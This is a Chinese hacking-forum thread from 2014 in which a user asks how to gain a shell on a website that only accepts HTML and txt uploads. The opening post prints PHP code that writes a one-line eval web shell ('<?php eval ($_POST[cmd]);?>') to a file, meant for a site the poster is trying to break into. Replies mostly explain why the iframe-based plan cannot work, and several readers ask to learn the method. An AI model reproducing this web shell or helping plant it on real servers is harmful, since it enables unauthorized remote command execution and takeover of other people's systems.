网站能上传HTML和txt，怎么拿shell

weibo · 发表于 2014-7-9 12:47:43

本来想着用html加iframe浮动框架，包含一个远程的php的文件进来，然后php文件执行下面的代码在刚上传的1.html同目录下生成一个一句话文件。。。
可惜思路错误，执行php文件的代码后，并不能在1.html同目录下生成一个一句话文件。分析才发现想法太2，这样执行只能在原来那个php的文件夹下生成一句话文件。。。

[PHP] 纯文本查看 复制代码

<?php
$filename = '1.php';
if (file_exists($filename)) {

} else {
$ft=fopen("1.php",w);
fwrite($ft,'<?php eval ($_POST[cmd]);?>'); 
fclose($ft);
echo "write in";
}
?>

希望各位大大给出比较合适的方法

weibo · 发表于 2014-7-9 12:49:12

快来解答吧各位{:soso_e183:}

Free_小东 · 发表于 2014-7-9 13:22:31

{:soso_e127:}哥这样能拿到shell我就服了你了能通过html拿shell的方法我至今未见过因为html不是在服务端运行的

weibo · 发表于 2014-7-9 15:29:39

Free_小东发表于 2014-7-9 13:22
哥这样能拿到shell我就服了你了能通过html拿shell的方法我至今未见过因为html不是在服务 ...

哥，难道说这个歪脖树咱拿不下来了？

huise · 发表于 2014-7-9 17:44:38

我也想知道

星南 · 发表于 2014-7-9 18:12:55

你用html包含一个php，能在你拿shell的网站目录下生成出文件，就真见鬼了。

oldsvn · 发表于 2014-7-10 13:51:14

提示: 作者被禁止或删除内容自动屏蔽

csadsl · 发表于 2014-7-10 18:21:00

拿到了说下，让我学习学习

huc-安阳 · 发表于 2014-7-11 21:27:45

你看得懂这段php代码吗，哥{:soso_e153:}，

f4ck009 · 发表于 2014-7-12 00:46:48

html不能在服务器端执行的，所以包含进去也执行不了

oldsvn oldsvn 当前离线积分 12 头像被屏蔽该用户从未签到	发表于 2014-7-10 13:51:14 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
oldsvn oldsvn 当前离线积分 12 头像被屏蔽该用户从未签到
	回复使用道具举报

网站能上传HTML和txt，怎么拿shell

点评

相关帖子

点评

指导单位

旗下站点

联系我们